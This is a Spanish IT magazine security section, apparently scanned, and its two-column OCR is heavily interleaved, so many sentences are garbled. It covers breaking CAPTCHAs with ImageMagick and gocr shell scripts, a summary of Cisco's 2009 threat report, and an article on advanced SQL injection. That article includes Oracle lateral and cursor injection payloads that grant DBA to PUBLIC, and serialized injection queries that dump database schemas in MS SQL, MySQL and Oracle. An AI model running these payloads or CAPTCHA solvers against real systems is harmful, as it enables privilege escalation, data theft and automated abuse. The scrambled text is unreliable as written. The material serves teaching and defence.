El hecho de vulnerar una aplicación información del negocio: disponibiliWeb no debe observarse como el ob- dad, integridad y confidencialidad. jetivo final de un incidente, sino como el primer paso de un proceso de frau- Es necesario abandonar la idea de las de que tiene como fin desestabilizar aplicaciones Web como espacios de una empresa, alterando alguno de contenido estático. Son un componente vital dentro de la estructura de un negocio dado su amplio abanico de ventajas en relación con su costo: * Practicidad del uso del navegador como cliente de aplicación ligero. * Facilidad de actualización y mantenimiento. * Carece de la necesidad de distribución e instalación.

30 / NEX IT Especial Web /


Seguridad

/ NEX IT Especial Web /

31


Seguridad * Multiplataforma.

análisis y diseño, porque en el mer-

* Independiente del hardware.

cado de las aplicaciones Web un tro-

* Alcance mundial.

pezón es caída. Y esto se acrecienta

* Agiliza las relaciones con clientes y cuando la empresa en cuestión basa potenciales clientes.

su negocio en el desarrollo de este

* Permite el acceso sin tener la ubica- tipo de herramientas. En el punto en ción o el horario como limitante.

que un incidente alcanza a oídos del

* Puede relacionarse con otras apli- usuario final, resulta extremadamencaciones Web expandiendo su fun- te costoso llegar a reparar el daño, no cionalidad.

solamente al factor técnico, sino a la imagen y el valor del producto a los

Todas estas ventajas se desmoronan ojos del cliente. cuando se percibe que la aplicación no es sólida en lo referente a la segu- Y es por eso que no es necesario ser ridad. Del lado del usuario provoca un un especialista en el tema para conrechazo inmediato, alimentado por la cluir que es de vital importancia para paranoia generada al saber que sus múltiples aspectos del negocio protedatos o los de su negocio están ex- ger la infraestructura de la aplicación puestos a manos de terceros. Por par- Web y a cada uno de los componentes te de la empresa, dispara un proceso y procesos que resultan involucrados. de reimplementación o modificación crítica de la aplicación, proceso que En esta ocasión se analizará en prosobrepasa por mucho el costo que fundidad uno de los métodos utilizahubiera tenido si se hubiese planifi- dos para evitar la automatización de cado en los comienzos del análisis y acciones externas, conocido como diseño de la plataforma.

Captcha, acrónimo de Completely Au-

Por lo anteriormente mencionado, tomated PublicTuring test to tell Comes de fundamental importancia tener puters and Humans Apart (prueba de en cuenta a la seguridad como pun- Turing pública y automática para dito fundamental durante las etapas de ferenciar máquinas y humanos). 32 / NEX IT Especial Web /


Seguridad

/ NEX IT Especial Web /

33


Seguridad

Captcha new

visitas y preguntas, aumentar entre otras cosas la posibilidad de estafar a otros usuarios que tienen confianza

Introducción

en el sistema. Eso sin contar las im-

Podemos entender por captcha a un plicancias que tiene registrar cuentas sistema que tiene como objetivo di- de correo para hacer spam. ferenciar a una máquina de un humano. Generalmente se presenta un tex- Uno de los métodos más usuales para to en una imagen distorsionada y se los atacantes, ya que el spam es un solicita que se ingresen las letras que negocio rentable, es lo que se conoce aparecen en la imagen. Si el texto in- como captcha camps, que son como gresado se corresponde con el texto call centers, pero los operadores inen la imagen, entonces se toma al gresan captchas todo el tiempo. usuario como humano y sino como máquina.

Otro de los métodos masivos es po-

En el día a día, en el ámbito de la se- ner el captcha que se quiere romper guridad, denominamos captcha a la en sitios pornográficos y cada vez que imagen, porque se sobreentiende alguien quiere ver una foto o video se todo el sistema que tiene detrás.

le pide ingresar el captcha.

Sirven como barrera de seguridad Los captchas son, probablemente, para evitar registraciones o acciones uno de los desafíos más interesanmasivas en sistemas de información. tes que se plantean en el campo de la Pensar, por ejemplo, en la posibili- seguridad informática, esto se debe dad de poder manejar a mil usuarios porque el resolver captchas es resolde un comercio electrónico y poder ver problemas de inteligencia artifihacer compras y ventas entre esos cial, que a menudo son complejos y usuarios, cobrar comisiones de referi- apasionantes. dos, aumentar reputación, aumentar

34 / NEX IT Especial Web /


Seguridad

Lavalle 348 Piso 6 - (C1043AAF) Buenos Aires - Argentina

/ NEX IT Especial Web /

35


Seguridad Podríamos separar el análisis de capt- cuencia de caracteres al azar, debecha en dos etapas, una inicial en la mos determinar el número máximo y que se estudia cómo está implemen- mínimo de caracteres que se generan tado el sistema de captcha y otra en y cuáles son esos caracteres, hacer la que se estudia la forma de trans- una lista y guardarla para el análisis formar la imagen a una que se pueda de imagen. leer. La primera es más sencilla que El próximo paso sería analizar el nomla segunda.

bre de la imagen, o el id que la identifica, en muchas ocasiones el nombre

Para analizar el funcionamiento, pri- de la imagen está relacionado con lo mero debemos tener una idea gene- que la imagen representa. En muchos ral de cómo es el esquema de gene- casos las imágenes presentan así: ración del captcha. https://www.url.com/accounts/CaptVamos por partes, en primer lugar cha?ctoken=5MgBBRtSqcYR7B0qqDt29G ingresamos valores y vemos cómo 0shT269Zww9gggWGLaMNGvPQPAIlE6S funciona. Y empezamos, primero 37WLxUzJUd2ZdW-hBXf5JDkzcbiTrm5bg analizamos el generador de texto e %3AXnvmTE2bwCjop_ocw81H5Q identificamos si se trata de un diccionario o de una selección al azar de O sea que la imagen es generada por caracteres, para ello realizamos un un módulo específico que recibe un muestreo. Si se trata de un dicciona- parámetro en forma de hash. Hay rio debemos determinar si se repiten que estudiar ese parámetro, hacer palabras, en caso de que se repitan nuevamente un muestreo, analizar palabras el captcha es vulnerable a si es aleatorio. La idea es saber si a un ataque por fuerza bruta, que con- partir del hash que se envía como pasiste en tratar de validar con la mis- rámetro sería posible deducir el texto ma palabra y con mucho paralelismo. que representa. Si por el contrario, se trata de una se- Otro enfoque es comprobar si es po-

36 / NEX IT Especial Web /


Seguridad sible reutilizar el captcha, si el siste- pecífico. ma de validación funciona correcta- Si bien cada captcha necesita de un mente, para eso se utilizan técnicas programa específico, se pueden idencomunes de seguridad. A veces la tificar algunos lineamientos generaimagen se genera del lado del clien- les que son los que vamos a ver en te, otras veces no hace falta ingresar este artículo. el captcha más de una vez y luego reutilizar la sesión. En esta primera etapa se requiere analizar el proceso paso a paso y buscar alguna anoma-

Ejemplos de código

lía que permita saltearse la protección, predecirla o deducirla, sin recu- <img

src=”http://ws89.ciudad.com.ar/

rrir a herramientas de tratamiento de ImagenControlAutomatas/imagen.aspx?t imágenes.

=459910000633856246176542077&amp ;l=ES-AR”>

Para la etapa de análisis de la imagen, vamos a utilizar una herramienta que <img

src=”https://ab.login.yahoo.com/

se llama ImageMagic, es gratuita y img/gb6h5eJZAegzqTDGPXv7ymqC81zse puede escriptear fácilmente con BL0m_OLRyhINiLImo2GFlznW1hCC7_dIbash, permitiéndonos realizar herra- hbj0XngLbi9qIxsQl1Auy2f7F56se72GQmientas en poco tiempo y de fácil SopwnoezFT8-.jpg” > lectura. También utilizaremos un OCR libre llamado gocr para procesar las <img src=https://www.mercadolibre.com/ imágenes ya transformadas.

jm/ml.captcha.ImgWordServlet?id=%2B

Cabe aclarar que no existe un méto- %2FZhN9%2BS%2BL8%3D> do general para solucionar todos los captchas, por lo que podríamos decir Ejemplos de Captchas que cada captcha es único y que se Análisis de imágenes merece un análisis y un programa es- El primer paso es encontrar un patrón

/ NEX IT Especial Web /

37


Seguridad

en las imágenes, para ello realizamos En base al patrón encontrado, nos un amplio muestreo y estudiamos las ideamos una estrategia para encarar imágenes teniendo en cuenta los si- el problema. En este tipo de probleguientes puntos:

mas, como muchos en programa-

•Fondo: estático / dinámico.

ción, conviene utilizar la estrategia de

•Cantidad Letras: constante / variable.

dividir y conquistar, con esto enten-

•Formato Letras: derechas / transfor- demos que tenemos que ir actuando madas.

secuencialmente.

•Tamaño Letras: constante / variable. •Letras Superpuestas: sí / no.

Podríamos listar los pasos así:

•Ángulo de inclinación: sí / no.

1- Separar letras del fondo.

•Ondulación: sí / no.

2- Segmentar letra por letra.

•Torcedura: sí / no.

3- Reconocer cada letra.

•Ruido: sí / no. •Colores.

38 / NEX IT Especial Web /


Seguridad

Separar letras del fondo

convert captcha.jpg -threshold 90% salida.gif

Para separar las letras del fondo generalmente hay que eliminar el ruido o las líneas finas que se entrecruzan,

convert salida.gif -blur 1 salida2.gif

para eso es común utilizar filtros de color. En algunos casos el fondo es aleatorio y las letras están todas de un mismo color, entonces se obtiene

convert salida2.gif -threshold 35% salida4.gif

el color predominante y se elimina el resto. color=$( ./getcolordominante.sh “$TMP” ) #separa las letras del fondo convert $TMP \( +clone -matte -transparent $color -fill white -colorize 100% \) -composite salida.gif

En otros casos hay ruido, por lo que hay que eliminar los puntos o líneas que contaminan la imagen, para eso debemos tener en cuenta que una imagen es una matriz y que podemos eliminar todas las regiones de la matriz que tengan una superficie menor a la de un umbral.

captcha normal

Una vez que ya tenemos las letras separadas del fondo, procedemos a estudiar el conjunto de letras. Acá tenemos que ser bien meticulosos y prestar atención a las transformaciones que afectan al conjunto. Si vemos que todas las letras están afectadas por el mismo efecto, le aplicamos el efecto contrario a la imagen, y si vemos que en cada letra se le aplica un efecto por separado, segmentamos y luego aplicamos el contra efecto solo a la letra. Por ejemplo, si notamos que la palabra aparece rotada, enderezamos la palabra completa, pero si vemos que cada letra presenta una rotación independiente, segmentamos y luego enderezamos letra por letra.

/ NEX IT Especial Web /

39


Seguridad

Técnicas y códigos

piso=$(./getcolores.sh

Aclaración general

{‘print $1’} | sed -n 2p| sed ‘s/://’ )

tmp3.gif

|

awk

Podríamos entender a un captcha echo “Cantidad de información:” $piso” como una imagen a la que se le aplicaron una serie de efectos en un or- Encontrar la rotación de la imagen den determinado, nuestra aproxima- Supongamos que tenemos una imación es revertir los efectos que se le gen que está rotada hacia un lado, el aplicaron para obtener la imagen pri- contra efecto sería aplicar una rotamitiva.

ción en el sentido inverso. Para esto

Sería algo así como aplicar los mis- utilizamos una transformación que se mos efectos pero en sentido inverso, llama “rotate” y que recibe un parápara hacer eso debemos conocer los metro que le indica los grados que se efectos que posiblemente se le estén rotará. La idea es aplicarle la rotación aplicando e idearnos una forma de iterativamente hasta enderezarla por medirlos. Nuestra forma de medirlos completo. Para saber cuándo detees segmentando la imagen, utiliza- nernos, nos valemos de un valor que mos funciones que miden la cantidad llamamos “piso” y que calculamos de información que hay en el techo, cada vez que rotamos la imagen un en el piso y a los lados.

grado. El piso es un valor fundamental para enderezar imágenes, vamos

EJEMPLO DE CODIGO

a rotar la imagen hasta que el valor del piso sea máximo.

{captcha sin rotar.png} #Calcular piso #Se corta el piso y se convierte a monocromo

convert

$anchox$alto+$x+$y\! tmp3.gif

40 / NEX IT Especial Web /

tmp.jpg

-crop

-monochrome piso = valor intermedio


Seguridad

/ NEX IT Especial Web /

41


Seguridad

convert [imagen] -background white -ro- lado = valor máximo tate $grados -trim tmp.gif {captcha rotado.png}

Otro de los efectos que aparecen es el de ondulación, este efecto consiste en aplicarle una onda a la imagen. Las ondas se describen con dos pa-

piso= valor máximo

rámetros, la amplitud y la longitud de onda. El objetivo es encontrar la

Una vez que el valor del piso es máxi- negación de esa onda, el valor que la mo, detenemos la rotación y pode- cancele y la transforme en una recta. mos comenzar a analizar otro aspec- Para esto también iteramos sobre los to como la torción, entonces iteramos dos parámetros, y para medir el éxicon el parámetro torsión, llamado to nos valemos de dos segmentos, el “shear” y buscamos en este caso el piso y el techo. lado máximo. {ondulado.png} {captcha sin torsion.png}

lado = valor intermedio

relación (piso,techo) = valor intermedio

convert [imagen] -background white convert $1 -wave -shear $torsion -trim tmp.gif

“$amplitud”x”$longitud” “$amplitud”-”$longitud”.gif

{captcha torsion.png} {sin ondular.png}

42 / NEX IT Especial Web /


Seguridad

relación (piso,techo) = valor máximo

amplitud y la longitud que las generó y se deduce cuál es el rango en

En el caso de las ondas, para tener el que hay que trabajar. A veces las una idea de los rangos en los que se ondas se aplican por segmentos disdebe trabajar la imagen conviene uti- continuos o letra por letra, ahí debelizar un programa como este:

mos segmentar y seguir estudiando. La idea de encontrar el efecto inver-

EJEMPLO DE CODIGO

so, no se limita a estos ejemplos que

#generador de ondas

vimos, sino que puede aplicarse a

#recibe como parámetro una imagen y

cualquier efecto, solamente hay que

#genera una conjunto de imágenes con iterar en los parámetros e idear una el nombre

manera de encontrar el valor adecua-

#que indica la amplitud y longitud que do. Lo más importante es tener una se le aplico

estrategia.

amplitud=-10 while [ $amplitud -lt 10 ] ; do

Reconocimiento de caracteres

longitud=10

En el momento de reconocer las le-

while [ $longitud -lt 200 ] ; do

tras tenemos dos opciones:

#wave amplitud(x)longitud de onda convert $1 -wave “$amplitud”x”$longitud” OCR: Reconocimiento óptico de ca“$amplitud”-”$longitud”.gif

racteres, se utiliza esta opción cuan-

let longitud=longitud+5

do las letras obtenidas tienen una

done

calidad aceptable, simplemente se le

let amplitud=amplitud+1

pasa la imagen ya trabajada al OCR

done

y éste devuelve una cadena. Un OCR conocido es el gocr (jocr.sourceforge.

Se estudian las imágenes obtenidas, net/) y da muy buenos resultados. estas imágenes tienen de nombre la

/ NEX IT Especial Web /

43


Seguridad

Diccionario: Debido a la distorsión fícil. Existen captchas sonoros, otros que sufrieron las letras durante su en los que hacen dibujar al usuario aislamiento, muchas veces estas no o seleccionar la imagen correcta, inpueden ser reconocidas por un OCR, cluso algunos piden resolver un cálpor lo que se recurre a la creación culo matemático. Para implementar de un diccionario de imágenes. Esta un captcha es bueno saber las fortécnica consiste en crear una base de mas que hay de estudiarlos, para así datos con imágenes y su representa- estar seguros de brindar una buena ción. La idea es que cuando se quie- calidad. Combinar un captcha con un ra reconocer una letra, se la compara sistema de reconocimiento por patrocon las imágenes de las letras alma- nes de tipeo puede ser una novedosa cenadas y se selecciona la imagen solución, pero una mala implemenque más coincidencias presenta. Las tación, tira para atrás cualquier idea coincidencias se pueden medir de innovadora. muchas maneras y el éxito del reconocimiento va a depender del méto- Acerca de do de comparación.

Thor Security es una empresa dedicada a brindar servicios especializados

Muchos de los captchas que se en- en el área de Seguridad de la Inforcuentran en Internet a menudo son mación. Con la visión de la seguridad fáciles de transformar a texto. La fa- aplicada a los negocios, Thor Security lla más usual es que son fáciles de asesora a clientes de los más variados segmentar, las letras se encuentran rubros y sus profesionales se insertan separadas, son fáciles de aislar y de en múltiples áreas de negocio. estudiar. Las principales dificultades se encuentran cuando las letras se superponen o tienen puntos de contacto, ahí la segmentación se torna di-

44 / NEX IT Especial Web /


Seguridad

/ NEX IT Especial Web /

45


Seguridad

El negocio de la Seguridad Innovación, sofisticación y colaboración entre criminales son algunas de las conclusiones del Midyear Security Report de Cisco para 2009.

A

medida que la econo-

ses. Estas innovaciones incluyen

mía mundial lucha por

“botnets como un servicio,” una

recuperar su equilibrio,

vuelta de tuerca a la tendencia del

el sector de la delin-

software-as-a-service.

cuencia online está más sano que

En esta edición del reporte se des-

nunca: innovación técnica, nuevas

tacan algunas de las técnicas co-

tácticas para la generación de ingre-

munes y estrategias de negocios

sos y adopción de las mejores es-

que los criminales utilizan para

trategias de negocio son algunas de

violar redes corporativas, com-

las maniobras utilizadas para lograr

prometer sitios Web y robar infor-

maximizar los beneficios.

mación y dinero. Veamos cuáles

Según el Cisco 2009 Midyear Secu-

son algunas de las conclusiones:

rity Report, en lo que va del año se registró un aumento en la sofistica-

•El gusano Conficker, que comen-

ción criminal y en la visión para los

zó a infectar sistemas de compu-

negocios. Esto se nota en, por ejem-

tadoras el año pasado al explotar

plo, la adaptación de modelos de ne-

las vulnerabilidades del sistema

gocios exitosos a sus propios intere-

operativo Windows, se continúa

46 / NEX IT Especial Web /


Foto: www.sxc.hu/ simon stratford

Seguridad

expandiendo. Varios millones de sis- bajo volumen pero en ataques más temas de computación estaban bajo frecuentes, en un esfuerzo por perel control del Conficker hasta junio de manecer fuera del radar. 2009.

•Los criminales cibernéticos se man-

•El presidente Barack Obama ha subido la seguridad cibernética de Es-

tienen al corriente de los eventos ac- tados Unidos a alta prioridad para su tuales y toman ventaja de ellos. Tras administración y busca trabajar con el brote de la gripe H1N1 (gripe por- la comunidad internacional y el seccina) en abril, los criminales ciberné- tor privado para incrementar las inticos cubrieron la Web rápidamente novaciones tecnológicas con el fin de con un spam que advertía sobre las reducir el crimen cibernético. Se esdrogas preventivas y links falsos a pera que este enfoque tenga un imfarmacias. Estos criminales aprove- pacto positivo para la industria en los chan habitualmente grandes eventos próximos meses. para lanzar estos tipos de ataques. Amenazas Específicas Mientras varios spammers continúan

•Botnets.

Estas redes de computa-

operando con volúmenes extrema- doras comprometidas sirven como damente altos, algunos optan por medios eficientes para lanzar ata-

/ NEX IT Especial Web /

47


Seguridad ques. Cada vez más, dueños de bot- vez más usado por criminales cibernets están alquilando estas redes a néticos para disfrazar malware como criminales que usan efectivamente software legítimo. Debido a que tanestos recursos para diseminar spams tos consumidores tienden a confiar y malwares a través del modelo de en los rankings de los buscadores software como servicio (SaaS).

líderes, pueden bajarse paquetes de

•Spam. Una de las maneras más es-

software falsos.

tablecidas para acceder a millones de

•Mensajes

de texto scams. Desde

computadoras con discursos legíti- el comienzo de 2009, por lo menos mos de ventas o enlaces a sitios Web dos o tres campañas han aparecido maliciosos. El spam continúa sien- cada semana amenazando dispositido el mayor vehículo para distribuir vos móviles. Cisco describe a la augusanos y malwares como también diencia móvil que crece rápidamente para cerrar el tráfico de Internet.

como la “nueva frontera para fraude

•Worms. El surgimiento de las redes

irresistible para los criminales”. Con

sociales ha hecho más fácil el lanza- aproximadamente 4,1 billones de miento de ataques con gusanos. Los suscripciones a teléfonos móviles usuarios que participan de estas co- mundialmente, un criminal puede munidades en línea son más propen- armar una red extraordinariamente sas a apretar links y bajar contenido amplia y terminar con una buena gaque creen son enviados por personas nancia aún si el ataque alcanza a una que conocen y en los que confían.

pequeña fracción de las víctimas.

•Spamdexing. Muchos tipos de em- •Insiders.

La recesión mundial ha

presas utilizan la optimización de mo- causado muchas pérdidas de trabatores de búsqueda para estar mejor jos. Como resultado, las amenazas posicionados en la lista de los bus- internas son una creciente preocucadores que lideran Google y otros pación para las empresas para los sitios. Spamdexing empaqueta sitios próximos meses. Personas internas Web con palabras claves relevantes que cometen fraude pueden ser tanto o términos de búsqueda y es cada contratadas o terceras partes, como 48 / NEX IT Especial Web /


Seguridad empleados actuales o ya fuera de la Es esencial asegurarse educación en empresa.

políticas de seguridad, tecnologías,

Recomendaciones

amenazas online, etc.

•La

•Tener presente los viejos problemas

seguridad debe moverse a la

misma velocidad que el crimen: las mientras se resuelven los nuevos: organizaciones y los usuarios no de- una máquina sin asegurar o aquellas ben esperar para actualizar sus siste- que ya no se usan son las que primemas operativos y las aplicaciones. La ro se infectan, dándole a los hackers lista de vulnerabilidades crece día a un lugar por donde ingresar a nuesdía, al igual que el número de nue- tro sistema. Las empresas deben revas aplicaciones. Además, las solu- cordar que un riesgo es un riesgo, y ciones de seguridad deben ser crea- mientras los criminales sean más sodas para reaccionar rápidamente, un fisticados, incluirán un arsenal de técclaro ejemplo de esto es el sistema nicas para llevar adelante el ataque, de anti-spam. La historia nos mues- aún si la probabilidad de lograrlo es tra que mucho de los ataques usan baja o remota. los mismos vectores para explotar

•La importancia de fuertes y reales

una vulnerabilidad o comprometer a políticas para proteger la informaun usuario. Conociendo la anatomía ción sensible: las empresas necesitan del ataque y utilizando soluciones y crear políticas progresivas que abartécnicas múltiples que se comple- quen anti-maware, políticas aceptamenten entre ellas para prevenir que bles y prevención de pérdida de inforlos ataques pasen a la siguiente fase, mación. El sector de IT debe trabajar ayudará a frenar y prevenir las rápi- en forma conjunta con los directivos das infecciones.

y los empleados para desarrollar po-

•La educación y la prevención son

líticas relevantes, de uso amigables y

críticos: los empleados deben ser flexibles. concientes de salvaguardar su identidad en los medios online y conocer los riesgos del uso de la tecnología. / NEX IT Especial Web /

49


Seguridad

SQL Injection: Ariel Liguori

Analista en Seguridad Informática

Más allá del ‘OR 1=1-Las técnicas de SQL Injection siguen constituyendo un gran número de las amenazas latentes en la red. A pesar de ello las variadas formas de explotación que posee constituyen el principal motivo de su continua evolución y su permanente utilización.

E

n este artículo, el último dores, el único medio que poseemos de la serie, se analizarán para la extracción de información es técnicas

avanzadas

de mediante la aplicación de ataques

explotación en diversos basados en tiempo. El inconveniente

ambientes y se realizará un análisis que surge en este caso es que podede cómo efectuar contramedidas efi- mos obtener información de dos mécientes a esta problemática que ata- todos conocidos: ñe a la mayoría de los sitios Web de

1) La extracción de información bit a

hoy en día.

bit.

2) La Deep Blind SQL Injection

extracción de información ba-

sándose en un algoritmo de búsque-

Al momento de encontrarnos ante un da binario. caso de Blind SQL Injection por defi- Estos casos poseen la limitación de nición, es decir que no se hacen visi- ser “una petición – una respuesta” bles ningún tipo de errores o indica- por lo cual el tiempo de extracción 50 / NEX IT Especial Web /


Seguridad

http://www.centraltech.com.ar - Lavalle 348 - Piso 6 - Buenos Aires - Argentina

http://centraltech.com.ar/promo_empresas.php

http://www.centraltech.com.ar/promo_estudiantes.php

http://www.centraltech.com.ar/promo_distancia.php / NEX IT Especial Web / 51


Seguridad de información es considerablemen- automática (BSQL Hacker). te elevado. Para saltear este impedi- Las desventajas de esta técnica son mento en las Deep Blind SQL Injec- principalmente: la inestabilidad en tion se enfrenta a la tarea de obtener ambientes en los cuales el delay de más de una respuesta por petición, lo la conexión es apreciable; y que en cual se logra mediante la utilización ciertas DB la aplicación de timeouts de diferencias en los delay de tiem- para las querys puede limitar el uso pos que se obtienen tras realizar los parcial de este método. request al server. Según un análisis se puede determinar que el tiempo Lateral SQL Injection & Cursor de obtención de datos se reduce has- Injection ta un 66 por ciento. En los casos de Este tipo de ataque fue introducido

“una petición – una respuesta” en

por David Litchfield de NGS Software

promedio se utilizan seis request al y tiene como finalidad la explotación Server por cada ‘char’ que se desea de bases de datos Oracle que hacen obtener, en los casos de Deep Blind uso de querys SQL con campos que SQLi se determina que si la primer poseen formato de fecha. Supongamitad del byte char que queremos mos una consulta SQL como la siextraer es “6” el servidor demorará guiente: 12 segundos en darnos la respuesta, create or replace procedure date_ si la segunda mitad es un “1” demo- proc is rará 2 segundos, es fácil de observar stmt varchar2(200); que dividiendo los tiempos de retar- v_date date:=sysdate; do por dos se obtiene el primer char begin (en este caso sería 0x61 ó “a”). Este stmt:=’select

object_name

from

método fue desarrollado por Ferruh all_objects where created = ‘’’ Mavituna y también está a nuestra ||v_date || ‘’’’; disposición un pequeño script para dbms_output.put_line(stmt); la comprobación de esta técnica y un execute immediate stmt; programa para explotarla de manera end; 52 / NEX IT Especial Web /


Seguridad /

ORA-06512:

at

“SYS.DATE_PRC”,

Este procedimiento no recibe paráme- line 7 tros externos, sin embargo en la con- ORA-06512: at line 1 sulta que se ejecuta se observa que se utiliza la fecha del sistema, si lo- De esta forma hemos “inyectado” al gráramos modificar el formato de ese formato de fechas de toda la DB una campo (y de todos los campos de ese comilla simple que concluirá en la potipo) podríamos forzar que se produz- sibilidad de inyección de código. Así can las condiciones de una SQLi. En mismo, en lugar de inyectar una comiel caso de Oracle esto es posible de la lla podemos inyectar un cursor, esta siguiente manera:

técnica también es descripta por David Litchfield y es conocida como Cursor

SQL> ALTER SESSION SET NLS_DATE_

Injection. Los cursores se utilizan en

FORMAT = ‘”SINGLE QUOTE ‘’”’;

PL/SQL para manejar las sentencias

Session altered.

SELECT, y son segmentos de memo-

SQL> SELECT SYSDATE FROM DUAL;

ria utilizados para realizar operacio-

SYSDATE

nes con los registros devueltos tras la

------------------------

ejecución de una consulta SELECT. De

SINGLE QUOTE ‘

tal modo podremos definir un cursor que ejecute una tarea maliciosa que

Al ejecutar el procedimiento que defi- deseemos, analicemos el caso típico nimos anteriormente se obtendría el de brindar privilegios de DBA al rol siguiente error:

PUBLIC:

SQL> EXEC DATE_PROC();

SQL> SET SERVEROUTPUT ON

BEGIN DATE_PRC(); END;

SQL> DECLARE

*

N NUMBER;

ERROR at line 1:

BEGIN

ORA-01756: quoted string not pro-

N:=DBMS_SQL.OPEN_CURSOR();

perly terminated

DBMS_SQL.PARSE(N,’DECLARE PRAG/ NEX IT Especial Web /

53


Seguridad MA AUTONOMOUS_TRANSACTION; BEGIN

Luego de esto hemos logrado la eje-

EXECUTE IMMEDIATE ‘’GRANT DBA TO

cución de nuestro código mediante la

PUBLIC’’; END;’,0);

utilización de Lateral SQL Injection y

DBMS_OUTPUT.PUT_LINE(‘Cursor

Cursor Injection.

is: ‘|| N); END;

Serialized SQL Injection

/

El Serialized SQL Injection surge de la idea de poder extraer de una base

Cursor is: 4 PL/SQL

procedure

successfully

de datos toda la información en un solo campo. Es una técnica novedosa

completed.

ideada inicialmente para MS SQL por Ahora para ejecutar este cursor debe- Dani Kachakil que consiste en serialimos modificar el formato del campo zar todos los resultados de la consulfecha de la siguiente forma:

ta a un string XML mediante el uso de la función FOR XML. Si bien inicial-

SQL> ALTER SESSION SET NLS_DATE_

mente se creó para MS SQL Server al

FORMAT = ‘”’’ AND

poco tiempo fue adaptada a MySQL,

DBMS_SQL.EXECUTE(4)=1--”’;

mediante la utilización de CONCAT y

Session altered.

GROUP_CONCAT y finalmente a Oracle utilizando XMLForest, XMLEle-

De este modo al ejecutarse la con- ment y SYS_XMLAGG. Analizaremos sulta obtendremos la ejecución del cada caso en detalle. siguiente código:

Serialized SQLi en MS-SQL Server: SQL> EXEC DATE_PROC();

Nativamente en MS-SQL Server 2000

select object_name from all_ob-

y en adelante podemos encontrarnos

jects where CREATED = ‘’ AND

con la cláusula FOR XML para permi-

DBMS_SQL.EXECUTE(4)=1--’

tir exportar los datos de una consulta

PL/SQL

a XML. De este modo supongamos

procedure

completed. 54 / NEX IT Especial Web /

successfully

que la siguiente inyección nos permi-


Seguridad

/ NEX IT Especial Web /

55


Seguridad te extraer datos de solo UN campo:

MyXML. Sin embargo es posible seriar los datos con formato XML me-

SELECT * FROM PAGES WHERE ID = 1

diante la utilización de las funciones

UNION SELECT ‘1’,’2’,@@version;

CONCAT y GROUP_CONCAT. La función CONCAT de MySQL per-

No obstante debido a la limitación de mite la seriación de campos de texsolo poder extraer datos de un cam- to y con la función GROUP_CONCAT po no seremos capaces de realizar se pueden seriar todos los datos de una inyección del tipo:

una determinada DB. Con ambas en conjunto podemos construir un árbol

UNION SELECT ‘1’,’2’,(SELECT name

XML y extraer los datos, por ejemplo:

FROM sysusers) select concat ‘[row]’ , ‘[sche-

Sin embargo mediante la utilización ma]’ , TABLE_SCHEMA , ‘[/schede la cláusula FORXML podemos rea- ma]’ , ‘[name]’ , TABLE_NAME , lizar una inyección del siguiente tipo: ‘[/name]’ , ‘[/row]’ ) from INFORMATION_SCHEMA.TABLES UNION SELECT ‘1’,’2’,(SELECT name

WHERE

Table_Type=’BASE TABLE’

FROM sysuser FOR XML raw)

De este modo obtendremos todos los

Hasta aquí obtenemos:

recordsets con la simple ejecución de [row][schema]mysql[/schema] una consulta.

[name]columns_priv[/name][/row] [row][schema]mysql[/schema]

MySQL Server:

[name>db[/name][/row]

En MySQL no poseemos por defec- [row][schema]mysql[/schema] to una cláusula para el trabajo con [name>func[/name][/row] XML, éste se logra mediante la opción “-xml” en la línea de comandos Con la siguiente inyección: o instalando un componente llamado select concat(‘[DS]’, group_con56 / NEX IT Especial Web /


Seguridad cat( concat(‘[row]’ , ‘[schema]’

unir todos los documentos o frag-

, TABLE_SCHEMA , ‘ [/schema] ‘ ,

mentos XML en uno solo. Con estas

‘ [name] ‘ , TABLE_NAME , ‘ [/

tres opciones estamos en condicio-

name]’,’[/row]’) SEPARATOR ‘’),

nes de realizar una inyección que sea

‘[/DS]’) from INFORMATION_SCHE-

capaz de devolvernos todos los datos

MA.TABLES WHERE Table_Type=’BASE

de una determinada DB en formato

TABLE’

XML: select

Obtenemos lo siguiente que ya posee gg(

cast(

sys_xmla-

xmlelement(

id,

estructura de XML:

xmlforest(tablespace_name,

[DS]

ble_name)), xmlformat(‘DS’)) as

[row][schema]mysql[/schema]

varchar2(4000))from user_tables;

ta-

[name]columns_priv[/name][/row] [row][schema]mysql[/schema] [name]db[/name][/row]

SQL Injection Tools

Las técnicas de SQL Injection son con-

[/DS]

ceptualmente sencillas sin embargo a la hora de explotarlas difícilmente

Oracle:

podamos realizar manualmente el

En Oracle tampoco se encuentra dis- análisis completo de un sitio. Esto se ponible la cláusula FOR XML, sin em- debe a que en los casos básicos de bargo existen elementos que facilitan SQL Injection quizá podremos enconel trabajo con XML, éstos son: XML- trarla pero el análisis de cada una de Forest, XMLElement y SYS_XMLA- las columnas y tablas puede demorar GG. La función XMLForest permite demasiado. Así mismo con los casos crear un árbol XML a partir de los de Blind SQL Injection la percepción parámetros que se le pasen; XMLE- de los tiempos que demora una págilement permite la incorporación de na o la diferencia en retardos pueden un elemento a un documento XML llegar a convertirse en humanamente y finalmente SYS_XMLAGG permite imperceptibles. Por eso mismo a la / NEX IT Especial Web /

57


Seguridad hora de realizar un penetration-test o particular los DataBase Firewalls, los simplemente probar la seguridad de cuales se encargan de analizar aquenuestras aplicaciones es recomenda- llas peticiones que interactúan con ble utilizar herramientas que simplifi- nuestra aplicación y, los DB FWs, las quen nuestro trabajo. Al margen de la que son destinadas a nuestras bases cantidad de herramientas que existen de datos. De este modo todo tipo de en el mercado también es posible la inyección encubierta será detectada elaboración de distintos scripts para y se tomarán las acciones que cada explotar vulnerabilidades.

sector crea correspondiente (las cuales son diversas y varían desde el

Countermeasures

ban de IP, omisión de la request, etc.).

Llegado el momento del deploy de Al margen de la aplicación de estos una aplicación en producción es nece- dispositivos (que cabe destacar que sario estar seguros de que dicha apli- muchas veces pueden ser reemplazacación no es vulnerable, al menos al dos por determinados IPS) es necemomento de su publicación. No obs- sario aumentar la seguridad en otros tante muchas veces no se toman los aspectos ya que nunca es convenienrecaudos ni se realizan las pruebas te dejar reposar todo lo referente a la necesarias para asegurar la confiabili- seguridad de nuestra empresa en un dad de nuestra aplicación. Es por ello solo foco, por lo cual la auditoria del que, al margen de las contramedidas código, las definiciones de perfiles básicas que se componen de pruebas en los servidores de bases de datos y en ambientes de pre-producción y la demás medidas serán obstáculos para auditoria del código, debemos imple- el atacante que aportarán un compomentar diversos niveles de seguridad nente extra a la seguridad de nuestras para garantizar el correcto funciona- aplicaciones y nuestro negocio. miento de nuestros servicios. Entre las contramedidas para los ataques Más info: de SQL Injection podemos nombrar http://elladodelmal.blogspot.com/ los Web Application Firewall y en 58 / NEX IT Especial Web /


Seguridad

